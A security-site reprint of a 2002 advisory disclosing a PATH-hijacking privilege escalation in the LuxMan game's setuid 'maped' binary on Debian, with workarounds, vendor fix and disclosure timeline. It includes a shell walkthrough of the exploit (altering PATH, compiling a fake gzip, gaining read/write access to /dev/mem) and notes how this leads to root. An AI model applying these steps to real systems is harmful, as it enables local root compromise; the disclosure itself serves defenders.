Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Non-Explicit Path Vulnerability in LuxMan 6 Nov. 2002    Summary Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man. A vulnerability in the product allows local attackers to gain elevated privileges.   Credit: The original advisory can be downloaded by to: http://www.idefense.com/advisory/11.06.02.txt The information has been provided by David Endler of iDEFENSE, the vulnerability was found by Texonet. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Maped is a setuid binary that belongs to LuxMan. It executes gzip without using the full path. A local attacker can create an exploit binary named gzip and have maped execute it by properly modifying the path environment variable. The following is a sample run and explanation of an exploit that will duplicate /dev/mem to /tmp/mem: First, the attacker sets the current working directory into the path environment variable: farmer@debian30:~$ export | grep PATH declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" farmer@debian30:~$ declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" farmer@debian30:~$ export | grep PATH declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" Second, the attacker compiles the exploit as a binary named gzip and creates a fake archive: farmer@debian30:~$ cc gzip.c -o gzip farmer@debian30:~$ touch test.gz Third, the attacker executes the maped binary: farmer@debian30:~$ `which maped` test.gz You must be the owner of the current console to use svgalib. Not running in a graphics capable console, and unable to find one. Using VGA driver. svgalib 1.4.3 ... At this point, /dev/mem is being duplicated into /dev/tmp. The descriptor to /dev/mem can be analyzed in a separate terminal: farmer@debian30:~$ lsof | grep /dev/mem gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem farmer@debian30:~$ cd /proc/5197/fd/ farmer@debian30:~$ ls -l total 0 lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1 l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991] lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1 lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem It is clear that descriptor 5 is a read write descriptor to /dev/mem. Analysis: Any local user can launch this attack to gain read/write access to /dev/mem. Such access can lead to local root compromise. Exploitation is possible by scanning the file for fragments of the master password file and modifying kernel memory to re-map system calls. Detection: LuxMan 0.41, which is packaged and distributed with Debian Linux 3.0r0, is vulnerable. It is probable that the same LuxMan version is vulnerable on other platforms as well. Workaround: Customers should consider one of the two following options: Option 1: Remove the LuxMan package by issuing the command "# apt-get remove luxman". Option 2: Remove the setuid bit from the maped binary by executing the command "# chmod -s `which maped`". Vendor response: The Debian Project has made available an updated LuxMan package that fixes this vulnerability. More information should be available in DSA-189 at http://www.debian.org/security/2002/dsa-189 Disclosure timeline: 10/03/2002 Issue disclosed to iDEFENSE 10/31/2002 Maintainer, Janos Lenart (ocsi@debian.org), and security@debian.org notified 10/31/2002 iDEFENSE clients notified 11/02/2002 Responses received from ocsi@debian.org and Martin Schulze 11/06/2002 Public disclosure  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability Insight Control for Linux Multiple Vulnerabilities HP-UX Running NFS/ONCplus Denial of Service Vulnerability HP-UX Running BIND Denial of Service Vulnerability 2011 HP-UX Running XNTP Denial of Service Vulnerability HP-UX Denial of Service Vulnerability Webkit Detached Body Element Code Execution Vulnerability Mac OS X Compact Font Format Decoder Code Execution Vulnerability WebKit WBR Tag Removal Code Execution Vulnerability Webkit Undefined DOM Prototype Attach Code Execution Vulnerability Apple HFS Information Disclosure Vulnerability XPDF arbitrary Arbitrary Code Execution Vulnerabilities Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®